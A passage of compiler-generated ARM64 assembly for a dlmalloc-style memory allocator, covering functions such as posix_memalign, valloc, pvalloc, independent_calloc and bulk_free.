ldr x0, [sp, #8]
bl _malloc
stur x0, [x29, #-8]
b LBB11_3
LBB11_2:
ldr x1, [sp, #16]
ldr x2, [sp, #8]
adrp x0, __gm_@PAGE
add x0, x0, __gm_@PAGEOFF
bl _internal_memalign
stur x0, [x29, #-8]
b LBB11_3
LBB11_3:
ldur x0, [x29, #-8]
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function internal_memalign
_internal_memalign: ; @internal_memalign
.cfi_startproc
; %bb.0:
sub sp, sp, #160
.cfi_def_cfa_offset 160
stp x29, x30, [sp, #144] ; 16-byte Folded Spill
add x29, sp, #144
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
stur x1, [x29, #-16]
stur x2, [x29, #-24]
; kill: def $x8 killed $xzr
stur xzr, [x29, #-32]
ldur x8, [x29, #-16]
subs x8, x8, #32
cset w8, hs
tbnz w8, #0, LBB12_2
b LBB12_1
LBB12_1:
mov x8, #32
stur x8, [x29, #-16]
b LBB12_2
LBB12_2:
ldur x8, [x29, #-16]
ldur x9, [x29, #-16]
subs x9, x9, #1
ands x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB12_7
b LBB12_3
LBB12_3:
mov x8, #32
stur x8, [x29, #-40]
b LBB12_4
LBB12_4: ; =>This Inner Loop Header: Depth=1
ldur x8, [x29, #-40]
ldur x9, [x29, #-16]
subs x8, x8, x9
cset w8, hs
tbnz w8, #0, LBB12_6
b LBB12_5
LBB12_5: ; in Loop: Header=BB12_4 Depth=1
ldur x8, [x29, #-40]
lsl x8, x8, #1
stur x8, [x29, #-40]
b LBB12_4
LBB12_6:
ldur x8, [x29, #-40]
stur x8, [x29, #-16]
b LBB12_7
LBB12_7:
ldur x8, [x29, #-24]
ldur x10, [x29, #-16]
mov x9, #-128
subs x9, x9, x10
subs x8, x8, x9
cset w8, lo
tbnz w8, #0, LBB12_11
b LBB12_8
LBB12_8:
ldur x8, [x29, #-8]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB12_10
b LBB12_9
LBB12_9:
bl ___error
mov w8, #12
str w8, [x0]
b LBB12_10
LBB12_10:
b LBB12_29
LBB12_11:
ldur x8, [x29, #-24]
subs x8, x8, #23
cset w8, hs
tbnz w8, #0, LBB12_13
b LBB12_12
LBB12_12:
mov x8, #32
str x8, [sp, #8] ; 8-byte Folded Spill
b LBB12_14
LBB12_13:
ldur x8, [x29, #-24]
add x8, x8, #8
add x8, x8, #15
and x8, x8, #0xfffffffffffffff0
str x8, [sp, #8] ; 8-byte Folded Spill
b LBB12_14
LBB12_14:
ldr x8, [sp, #8] ; 8-byte Folded Reload
stur x8, [x29, #-48]
ldur x8, [x29, #-48]
ldur x9, [x29, #-16]
add x8, x8, x9
add x8, x8, #32
subs x8, x8, #8
stur x8, [x29, #-56]
ldur x0, [x29, #-56]
bl _malloc
stur x0, [x29, #-32]
ldur x8, [x29, #-32]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB12_28
b LBB12_15
LBB12_15:
ldur x8, [x29, #-32]
subs x8, x8, #16
stur x8, [x29, #-64]
ldur x8, [x29, #-32]
ldur x9, [x29, #-16]
subs x9, x9, #1
ands x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB12_23
b LBB12_16
LBB12_16:
ldur x8, [x29, #-32]
ldur x9, [x29, #-16]
add x8, x8, x9
subs x8, x8, #1
ldur x10, [x29, #-16]
mov x9, #0
subs x9, x9, x10
and x8, x8, x9
subs x8, x8, #16
str x8, [sp, #72]
ldr x8, [sp, #72]
ldur x9, [x29, #-64]
subs x8, x8, x9
subs x8, x8, #32
cset w8, lo
tbnz w8, #0, LBB12_18
b LBB12_17
LBB12_17:
ldr x8, [sp, #72]
str x8, [sp] ; 8-byte Folded Spill
b LBB12_19
LBB12_18:
ldr x8, [sp, #72]
ldur x9, [x29, #-16]
add x8, x8, x9
str x8, [sp] ; 8-byte Folded Spill
b LBB12_19
LBB12_19:
ldr x8, [sp] ; 8-byte Folded Reload
str x8, [sp, #64]
ldr x8, [sp, #64]
str x8, [sp, #56]
ldr x8, [sp, #64]
ldur x9, [x29, #-64]
subs x8, x8, x9
str x8, [sp, #48]
ldur x8, [x29, #-64]
ldr x8, [x8, #8]
and x8, x8, #0xfffffffffffffff8
ldr x9, [sp, #48]
subs x8, x8, x9
str x8, [sp, #40]
ldur x8, [x29, #-64]
ldr x8, [x8, #8]
ands x8, x8, #0x3
cset w8, ne
tbnz w8, #0, LBB12_21
b LBB12_20
LBB12_20:
ldur x8, [x29, #-64]
ldr x8, [x8]
ldr x9, [sp, #48]
add x8, x8, x9
ldr x9, [sp, #56]
str x8, [x9]
ldr x8, [sp, #40]
ldr x9, [sp, #56]
str x8, [x9, #8]
b LBB12_22
LBB12_21:
ldr x8, [sp, #56]
ldr x8, [x8, #8]
and x8, x8, #0x1
ldr x9, [sp, #40]
orr x8, x8, x9
orr x8, x8, #0x2
ldr x9, [sp, #56]
str x8, [x9, #8]
ldr x8, [sp, #56]
ldr x9, [sp, #40]
add x9, x8, x9
ldr x8, [x9, #8]
orr x8, x8, #0x1
str x8, [x9, #8]
ldur x8, [x29, #-64]
ldr x8, [x8, #8]
and x8, x8, #0x1
ldr x9, [sp, #48]
orr x8, x8, x9
orr x8, x8, #0x2
ldur x9, [x29, #-64]
str x8, [x9, #8]
ldur x8, [x29, #-64]
ldr x9, [sp, #48]
add x9, x8, x9
ldr x8, [x9, #8]
orr x8, x8, #0x1
str x8, [x9, #8]
ldur x0, [x29, #-8]
ldur x1, [x29, #-64]
ldr x2, [sp, #48]
bl _dispose_chunk
b LBB12_22
LBB12_22:
ldr x8, [sp, #56]
stur x8, [x29, #-64]
b LBB12_23
LBB12_23:
ldur x8, [x29, #-64]
ldr x8, [x8, #8]
ands x8, x8, #0x3
cset w8, eq
tbnz w8, #0, LBB12_27
b LBB12_24
LBB12_24:
ldur x8, [x29, #-64]
ldr x8, [x8, #8]
and x8, x8, #0xfffffffffffffff8
str x8, [sp, #32]
ldr x8, [sp, #32]
ldur x9, [x29, #-48]
add x9, x9, #32
subs x8, x8, x9
cset w8, ls
tbnz w8, #0, LBB12_26
b LBB12_25
LBB12_25:
ldr x8, [sp, #32]
ldur x9, [x29, #-48]
subs x8, x8, x9
str x8, [sp, #24]
ldur x8, [x29, #-64]
ldur x9, [x29, #-48]
add x8, x8, x9
str x8, [sp, #16]
ldur x8, [x29, #-64]
ldr x8, [x8, #8]
and x8, x8, #0x1
ldur x9, [x29, #-48]
orr x8, x8, x9
orr x8, x8, #0x2
ldur x9, [x29, #-64]
str x8, [x9, #8]
ldur x8, [x29, #-64]
ldur x9, [x29, #-48]
add x9, x8, x9
ldr x8, [x9, #8]
orr x8, x8, #0x1
str x8, [x9, #8]
ldr x8, [sp, #16]
ldr x8, [x8, #8]
and x8, x8, #0x1
ldr x9, [sp, #24]
orr x8, x8, x9
orr x8, x8, #0x2
ldr x9, [sp, #16]
str x8, [x9, #8]
ldr x8, [sp, #16]
ldr x9, [sp, #24]
add x9, x8, x9
ldr x8, [x9, #8]
orr x8, x8, #0x1
str x8, [x9, #8]
ldur x0, [x29, #-8]
ldr x1, [sp, #16]
ldr x2, [sp, #24]
bl _dispose_chunk
b LBB12_26
LBB12_26:
b LBB12_27
LBB12_27:
ldur x8, [x29, #-64]
add x8, x8, #16
stur x8, [x29, #-32]
b LBB12_28
LBB12_28:
b LBB12_29
LBB12_29:
ldur x0, [x29, #-32]
ldp x29, x30, [sp, #144] ; 16-byte Folded Reload
add sp, sp, #160
ret
.cfi_endproc
; -- End function
.globl _posix_memalign ; -- Begin function posix_memalign
.p2align 2
_posix_memalign: ; @posix_memalign
.cfi_startproc
; %bb.0:
sub sp, sp, #80
.cfi_def_cfa_offset 80
stp x29, x30, [sp, #64] ; 16-byte Folded Spill
add x29, sp, #64
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-16]
stur x1, [x29, #-24]
str x2, [sp, #32]
; kill: def $x8 killed $xzr
str xzr, [sp, #24]
ldur x8, [x29, #-24]
subs x8, x8, #16
cset w8, ne
tbnz w8, #0, LBB13_2
b LBB13_1
LBB13_1:
ldr x0, [sp, #32]
bl _malloc
str x0, [sp, #24]
b LBB13_12
LBB13_2:
ldur x8, [x29, #-24]
mov x10, #8
udiv x8, x8, x10
str x8, [sp, #16]
ldur x8, [x29, #-24]
udiv x9, x8, x10
mul x9, x9, x10
subs x8, x8, x9
str x8, [sp, #8]
ldr x8, [sp, #8]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB13_5
b LBB13_3
LBB13_3:
ldr x8, [sp, #16]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB13_5
b LBB13_4
LBB13_4:
ldr x8, [sp, #16]
ldr x9, [sp, #16]
subs x9, x9, #1
ands x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB13_6
b LBB13_5
LBB13_5:
mov w8, #22
stur w8, [x29, #-4]
b LBB13_15
LBB13_6:
ldr x8, [sp, #32]
ldur x10, [x29, #-24]
mov x9, #-128
subs x9, x9, x10
subs x8, x8, x9
cset w8, hi
tbnz w8, #0, LBB13_10
b LBB13_7
LBB13_7:
ldur x8, [x29, #-24]
subs x8, x8, #32
cset w8, hs
tbnz w8, #0, LBB13_9
b LBB13_8
LBB13_8:
mov x8, #32
stur x8, [x29, #-24]
b LBB13_9
LBB13_9:
ldur x1, [x29, #-24]
ldr x2, [sp, #32]
adrp x0, __gm_@PAGE
add x0, x0, __gm_@PAGEOFF
bl _internal_memalign
str x0, [sp, #24]
b LBB13_10
LBB13_10:
b LBB13_11
LBB13_11:
b LBB13_12
LBB13_12:
ldr x8, [sp, #24]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB13_14
b LBB13_13
LBB13_13:
mov w8, #12
stur w8, [x29, #-4]
b LBB13_15
LBB13_14:
ldr x8, [sp, #24]
ldur x9, [x29, #-16]
str x8, [x9]
stur wzr, [x29, #-4]
b LBB13_15
LBB13_15:
ldur w0, [x29, #-4]
ldp x29, x30, [sp, #64] ; 16-byte Folded Reload
add sp, sp, #80
ret
.cfi_endproc
; -- End function
.globl _valloc ; -- Begin function valloc
.p2align 2
_valloc: ; @valloc
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, _mparams@PAGE
adrp x9, _mparams@PAGE
add x9, x9, _mparams@PAGEOFF
str x9, [sp, #8] ; 8-byte Folded Spill
stur x0, [x29, #-8]
ldr x8, [x8, _mparams@PAGEOFF]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB14_2
b LBB14_1
LBB14_1:
bl _init_mparams
b LBB14_2
LBB14_2:
ldr x8, [sp, #8] ; 8-byte Folded Reload
ldr x8, [x8, #8]
str x8, [sp, #16]
ldr x0, [sp, #16]
ldur x1, [x29, #-8]
bl _memalign
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function init_mparams
_init_mparams: ; @init_mparams
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, _mparams@PAGE
adrp x9, _mparams@PAGE
add x9, x9, _mparams@PAGEOFF
str x9, [sp, #8] ; 8-byte Folded Spill
adrp x9, __gm_@PAGE
add x9, x9, __gm_@PAGEOFF
str x9, [sp, #16] ; 8-byte Folded Spill
ldr x8, [x8, _mparams@PAGEOFF]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB15_5
b LBB15_1
LBB15_1:
mov x8, #4096
stur x8, [x29, #-16]
ldur x8, [x29, #-16]
str x8, [sp, #24]
ldr x8, [sp, #24]
ldr x9, [sp, #24]
subs x9, x9, #1
ands x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB15_3
b LBB15_2
LBB15_2:
ldur x8, [x29, #-16]
ldur x9, [x29, #-16]
subs x9, x9, #1
ands x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB15_4
b LBB15_3
LBB15_3:
bl _abort
LBB15_4:
ldr x9, [sp, #16] ; 8-byte Folded Reload
ldr x8, [sp, #8] ; 8-byte Folded Reload
ldr x10, [sp, #24]
str x10, [x8, #16]
ldur x10, [x29, #-16]
str x10, [x8, #8]
mov x10, #262144
str x10, [x8, #24]
mov x10, #2097152
str x10, [x8, #32]
mov w10, #1
str w10, [x8, #40]
ldr w8, [x8, #40]
str w8, [x9, #880]
mov x0, #0
bl _time
mov x8, #21845
movk x8, #21845, lsl #16
eor x8, x0, x8
stur x8, [x29, #-8]
ldur x8, [x29, #-8]
orr x8, x8, #0x8
stur x8, [x29, #-8]
ldur x8, [x29, #-8]
and x8, x8, #0xfffffffffffffff8
stur x8, [x29, #-8]
ldur x8, [x29, #-8]
adrp x9, _mparams@PAGE
str x8, [x9, _mparams@PAGEOFF]
b LBB15_5
LBB15_5:
mov w0, #1
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.globl _pvalloc ; -- Begin function pvalloc
.p2align 2
_pvalloc: ; @pvalloc
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, _mparams@PAGE
adrp x9, _mparams@PAGE
add x9, x9, _mparams@PAGEOFF
str x9, [sp, #8] ; 8-byte Folded Spill
stur x0, [x29, #-8]
ldr x8, [x8, _mparams@PAGEOFF]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB16_2
b LBB16_1
LBB16_1:
bl _init_mparams
b LBB16_2
LBB16_2:
ldr x8, [sp, #8] ; 8-byte Folded Reload
ldr x8, [x8, #8]
str x8, [sp, #16]
ldr x0, [sp, #16]
ldur x8, [x29, #-8]
ldr x9, [sp, #16]
add x8, x8, x9
subs x8, x8, #1
ldr x9, [sp, #16]
subs x9, x9, #1
bic x1, x8, x9
bl _memalign
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.globl _independent_calloc ; -- Begin function independent_calloc
.p2align 2
_independent_calloc: ; @independent_calloc
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
str x1, [sp, #16]
str x2, [sp, #8]
ldr x8, [sp, #16]
mov x2, sp
str x8, [sp]
ldur x1, [x29, #-8]
ldr x4, [sp, #8]
adrp x0, __gm_@PAGE
add x0, x0, __gm_@PAGEOFF
mov w3, #3
bl _ialloc
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function ialloc
_ialloc: ; @ialloc
.cfi_startproc
; %bb.0:
sub sp, sp, #192
.cfi_def_cfa_offset 192
stp x29, x30, [sp, #176] ; 16-byte Folded Spill
add x29, sp, #176
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-16]
stur x1, [x29, #-24]
stur x2, [x29, #-32]
stur w3, [x29, #-36]
stur x4, [x29, #-48]
adrp x8, _mparams@PAGE
ldr x8, [x8, _mparams@PAGEOFF]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB18_2
b LBB18_1
LBB18_1:
bl _init_mparams
b LBB18_2
LBB18_2:
ldur x8, [x29, #-48]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB18_6
b LBB18_3
LBB18_3:
ldur x8, [x29, #-24]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB18_5
b LBB18_4
LBB18_4:
ldur x8, [x29, #-48]
stur x8, [x29, #-8]
b LBB18_46
LBB18_5:
ldur x8, [x29, #-48]
str x8, [sp, #72]
stur xzr, [x29, #-72]
b LBB18_12
LBB18_6:
ldur x8, [x29, #-24]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB18_8
b LBB18_7
LBB18_7:
mov x0, #0
bl _malloc
stur x0, [x29, #-8]
b LBB18_46
LBB18_8:
; kill: def $x8 killed $xzr
str xzr, [sp, #72]
ldur x8, [x29, #-24]
lsl x8, x8, #3
subs x8, x8, #23
cset w8, hs
tbnz w8, #0, LBB18_10
b LBB18_9
LBB18_9:
mov x8, #32
str x8, [sp, #24] ; 8-byte Folded Spill
b LBB18_11
LBB18_10:
ldur x8, [x29, #-24]
lsl x8, x8, #3
add x8, x8, #8
add x8, x8, #15
and x8, x8, #0xfffffffffffffff0
str x8, [sp, #24] ; 8-byte Folded Spill
b LBB18_11
LBB18_11:
ldr x8, [sp, #24] ; 8-byte Folded Reload
stur x8, [x29, #-72]
b LBB18_12
LBB18_12:
ldur w8, [x29, #-36]
ands w8, w8, #0x1
cset w8, eq
tbnz w8, #0, LBB18_17
b LBB18_13
LBB18_13:
ldur x8, [x29, #-32]
ldr x8, [x8]
subs x8, x8, #23
cset w8, hs
tbnz w8, #0, LBB18_15
b LBB18_14
LBB18_14:
mov x8, #32
str x8, [sp, #16] ; 8-byte Folded Spill
b LBB18_16
LBB18_15:
ldur x8, [x29, #-32]
ldr x8, [x8]
add x8, x8, #8
add x8, x8, #15
and x8, x8, #0xfffffffffffffff0
str x8, [sp, #16] ; 8-byte Folded Spill
b LBB18_16
LBB18_16:
ldr x8, [sp, #16] ; 8-byte Folded Reload
stur x8, [x29, #-56]
ldur x8, [x29, #-24]
ldur x9, [x29, #-56]
mul x8, x8, x9
stur x8, [x29, #-64]
b LBB18_25
LBB18_17:
stur xzr, [x29, #-56]
stur xzr, [x29, #-64]
str xzr, [sp, #40]
b LBB18_18
LBB18_18: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp, #40]
ldur x9, [x29, #-24]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB18_24
b LBB18_19
LBB18_19: ; in Loop: Header=BB18_18 Depth=1
ldur x8, [x29, #-32]
ldr x9, [sp, #40]
ldr x8, [x8, x9, lsl #3]
subs x8, x8, #23
cset w8, hs
tbnz w8, #0, LBB18_21
b LBB18_20
LBB18_20: ; in Loop: Header=BB18_18 Depth=1
mov x8, #32
str x8, [sp, #8] ; 8-byte Folded Spill
b LBB18_22
LBB18_21: ; in Loop: Header=BB18_18 Depth=1
ldur x8, [x29, #-32]
ldr x9, [sp, #40]
ldr x8, [x8, x9, lsl #3]
add x8, x8, #8
add x8, x8, #15
and x8, x8, #0xfffffffffffffff0
str x8, [sp, #8] ; 8-byte Folded Spill
b LBB18_22
LBB18_22: ; in Loop: Header=BB18_18 Depth=1
ldr x9, [sp, #8] ; 8-byte Folded Reload
ldur x8, [x29, #-64]
add x8, x8, x9
stur x8, [x29, #-64]
b LBB18_23
LBB18_23: ; in Loop: Header=BB18_18 Depth=1
ldr x8, [sp, #40]
add x8, x8, #1
str x8, [sp, #40]
b LBB18_18
LBB18_24:
b LBB18_25
LBB18_25:
ldur x8, [x29, #-64]
ldur x9, [x29, #-72]
add x8, x8, x9
str x8, [sp, #48]
ldur x8, [x29, #-16]
ldr w8, [x8, #880]
; kill: def $x8 killed $w8
and x8, x8, #0x1
; kill: def $w8 killed $w8 killed $x8
str w8, [sp, #60]
ldur x9, [x29, #-16]
ldr w8, [x9, #880]
; kill: def $x8 killed $w8
and x8, x8, #0xfffffffffffffffe
; kill: def $w8 killed $w8 killed $x8
str w8, [x9, #880]
ldr x8, [sp, #48]
subs x0, x8, #8
bl _malloc
stur x0, [x29, #-80]
ldr w8, [sp, #60]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB18_27
b LBB18_26
LBB18_26:
ldur x9, [x29, #-16]
ldr w8, [x9, #880]
; kill: def $x8 killed $w8
orr x8, x8, #0x1
; kill: def $w8 killed $w8 killed $x8
str w8, [x9, #880]
b LBB18_27
LBB18_27:
ldur x8, [x29, #-80]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB18_29
b LBB18_28
LBB18_28:
; kill: def $x8 killed $xzr
stur xzr, [x29, #-8]
b LBB18_46
LBB18_29:
ldur x8, [x29, #-80]
subs x8, x8, #16
str x8, [sp, #88]
ldr x8, [sp, #88]
ldr x8, [x8, #8]
and x8, x8, #0xfffffffffffffff8
str x8, [sp, #80]
ldur w8, [x29, #-36]
ands w8, w8, #0x2
cset w8, eq
tbnz w8, #0, LBB18_31
b LBB18_30
LBB18_30:
ldur x0, [x29, #-80]
ldr x8, [sp, #80]
subs x8, x8, #8
ldur x9, [x29, #-72]
subs x2, x8, x9
mov w1, #0
mov x3, #-1
bl ___memset_chk
b LBB18_31
LBB18_31:
ldr x8, [sp, #72]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB18_33
b LBB18_32
LBB18_32:
ldr x8, [sp, #88]
ldur x9, [x29, #-64]
add x8, x8, x9
str x8, [sp, #64]
ldr x8, [sp, #80]
ldur x9, [x29, #-64]
subs x8, x8, x9
str x8, [sp, #32]
ldr x8, [sp, #64]
add x8, x8, #16
str x8, [sp, #72]
ldr x8, [sp, #32]
orr x8, x8, #0x1
orr x8, x8, #0x2
ldr x9, [sp, #64]
str x8, [x9, #8]
ldur x8, [x29, #-64]
str x8, [sp, #80]
b LBB18_33
LBB18_33:
str xzr, [sp, #40]
b LBB18_34
LBB18_34: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp, #88]
add x8, x8, #16
ldr x9, [sp, #72]
ldr x10, [sp, #40]
str x8, [x9, x10, lsl #3]
ldr x8, [sp, #40]
ldur x9, [x29, #-24]
subs x9, x9, #1
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB18_42
b LBB18_35
LBB18_35: ; in Loop: Header=BB18_34 Depth=1
ldur x8, [x29, #-56]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB18_37
b LBB18_36
LBB18_36: ; in Loop: Header=BB18_34 Depth=1
ldur x8, [x29, #-56]
str x8, [sp, #48]
b LBB18_41
LBB18_37: ; in Loop: Header=BB18_34 Depth=1
ldur x8, [x29, #-32]
ldr x9, [sp, #40]
ldr x8, [x8, x9, lsl #3]
subs x8, x8, #23
cset w8, hs
tbnz w8, #0, LBB18_39
b LBB18_38
LBB18_38: ; in Loop: Header=BB18_34 Depth=1
mov x8, #32
str x8, [sp] ; 8-byte Folded Spill
b LBB18_40
LBB18_39: ; in Loop: Header=BB18_34 Depth=1
ldur x8, [x29, #-32]
ldr x9, [sp, #40]
ldr x8, [x8, x9, lsl #3]
add x8, x8, #8
add x8, x8, #15
and x8, x8, #0xfffffffffffffff0
str x8, [sp] ; 8-byte Folded Spill
b LBB18_40
LBB18_40: ; in Loop: Header=BB18_34 Depth=1
ldr x8, [sp] ; 8-byte Folded Reload
str x8, [sp, #48]
b LBB18_41
LBB18_41: ; in Loop: Header=BB18_34 Depth=1
ldr x9, [sp, #48]
ldr x8, [sp, #80]
subs x8, x8, x9
str x8, [sp, #80]
ldr x8, [sp, #48]
orr x8, x8, #0x1
orr x8, x8, #0x2
ldr x9, [sp, #88]
str x8, [x9, #8]
ldr x8, [sp, #88]
ldr x9, [sp, #48]
add x8, x8, x9
str x8, [sp, #88]
b LBB18_43
LBB18_42:
ldr x8, [sp, #80]
orr x8, x8, #0x1
orr x8, x8, #0x2
ldr x9, [sp, #88]
str x8, [x9, #8]
b LBB18_45
LBB18_43: ; in Loop: Header=BB18_34 Depth=1
b LBB18_44
LBB18_44: ; in Loop: Header=BB18_34 Depth=1
ldr x8, [sp, #40]
add x8, x8, #1
str x8, [sp, #40]
b LBB18_34
LBB18_45:
ldr x8, [sp, #72]
stur x8, [x29, #-8]
b LBB18_46
LBB18_46:
ldur x0, [x29, #-8]
ldp x29, x30, [sp, #176] ; 16-byte Folded Reload
add sp, sp, #192
ret
.cfi_endproc
; -- End function
.globl _independent_comalloc ; -- Begin function independent_comalloc
.p2align 2
_independent_comalloc: ; @independent_comalloc
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
str x1, [sp, #16]
str x2, [sp, #8]
ldur x1, [x29, #-8]
ldr x2, [sp, #16]
ldr x4, [sp, #8]
adrp x0, __gm_@PAGE
add x0, x0, __gm_@PAGEOFF
mov w3, #0
bl _ialloc
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.globl _bulk_free ; -- Begin function bulk_free
.p2align 2
_bulk_free: ; @bulk_free
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
str x0, [sp, #8]
str x1, [sp]
ldr x1, [sp, #8]
ldr x2, [sp]
adrp x0, __gm_@PAGE
add x0, x0, __gm_@PAGEOFF
bl _internal_bulk_free
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function internal_bulk_free
_internal_bulk_free: ; @internal_bulk_free
.cfi_startproc
; %bb.0:
sub sp, sp, #128
.cfi_def_cfa_offset 128
stp x29, x30, [sp, #112] ; 16-byte Folded Spill
add x29, sp, #112
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
stur x1, [x29, #-16]
stur x2, [x29, #-24]
stur xzr, [x29, #-32]
ldur x8, [x29, #-16]
ldur x9, [x29, #-24]
add x8, x8, x9, lsl #3
stur x8, [x29, #-48]
ldur x8, [x29, #-16]
stur x8, [x29, #-40]
b LBB21_1
LBB21_1: ; =>This Inner Loop Header: Depth=1
ldur x8, [x29, #-40]
ldur x9, [x29, #-48]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB21_15
b LBB21_2
LBB21_2: ; in Loop: Header=BB21_1 Depth=1
ldur x8, [x29, #-40]
ldr x8, [x8]
str x8, [sp, #56]
ldr x8, [sp, #56]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB21_13
b LBB21_3
LBB21_3: ; in Loop: Header=BB21_1 Depth=1
ldr x8, [sp, #56]
subs x8, x8, #16
str x8, [sp, #48]
ldr x8, [sp, #48]
ldr x8, [x8, #8]
and x8, x8, #0xfffffffffffffff8
str x8, [sp, #40]
ldur x8, [x29, #-40]
; kill: def $x9 killed $xzr
str xzr, [x8]
ldr x8, [sp, #48]
ldur x9, [x29, #-8]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w8, lo
mov w9, #0
str w9, [sp, #12] ; 4-byte Folded Spill
tbnz w8, #0, LBB21_5
b LBB21_4
LBB21_4: ; in Loop: Header=BB21_1 Depth=1
ldr x8, [sp, #48]
ldr x8, [x8, #8]
and x8, x8, #0x3
subs x8, x8, #1
cset w8, ne
str w8, [sp, #12] ; 4-byte Folded Spill
b LBB21_5
LBB21_5: ; in Loop: Header=BB21_1 Depth=1
ldr w8, [sp, #12] ; 4-byte Folded Reload
; kill: def $x8 killed $w8
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB21_11
b LBB21_6
LBB21_6: ; in Loop: Header=BB21_1 Depth=1
ldur x8, [x29, #-40]
add x8, x8, #8
str x8, [sp, #32]
ldr x8, [sp, #48]
ldr x9, [sp, #48]
ldr x9, [x9, #8]
and x9, x9, #0xfffffffffffffff8
add x8, x8, x9
str x8, [sp, #24]
ldr x8, [sp, #32]
ldur x9, [x29, #-48]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB21_9
b LBB21_7
LBB21_7: ; in Loop: Header=BB21_1 Depth=1
ldr x8, [sp, #32]
ldr x8, [x8]
ldr x9, [sp, #24]
add x9, x9, #16
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB21_9
b LBB21_8
LBB21_8: ; in Loop: Header=BB21_1 Depth=1
ldr x8, [sp, #24]
ldr x8, [x8, #8]
and x8, x8, #0xfffffffffffffff8
ldr x9, [sp, #40]
add x8, x8, x9
str x8, [sp, #16]
ldr x8, [sp, #48]
ldr x8, [x8, #8]
and x8, x8, #0x1
ldr x9, [sp, #16]
orr x8, x8, x9
orr x8, x8, #0x2
ldr x9, [sp, #48]
str x8, [x9, #8]
ldr x8, [sp, #48]
ldr x9, [sp, #16]
add x9, x8, x9
ldr x8, [x9, #8]
orr x8, x8, #0x1
str x8, [x9, #8]
ldr x8, [sp, #48]
add x8, x8, #16
ldr x9, [sp, #32]
str x8, [x9]
b LBB21_10
LBB21_9: ; in Loop: Header=BB21_1 Depth=1
ldur x0, [x29, #-8]
ldr x1, [sp, #48]
ldr x2, [sp, #40]
bl _dispose_chunk
b LBB21_10
LBB21_10: ; in Loop: Header=BB21_1 Depth=1
b LBB21_12
LBB21_11:
bl _abort
LBB21_12: ; in Loop: Header=BB21_1 Depth=1
b LBB21_13
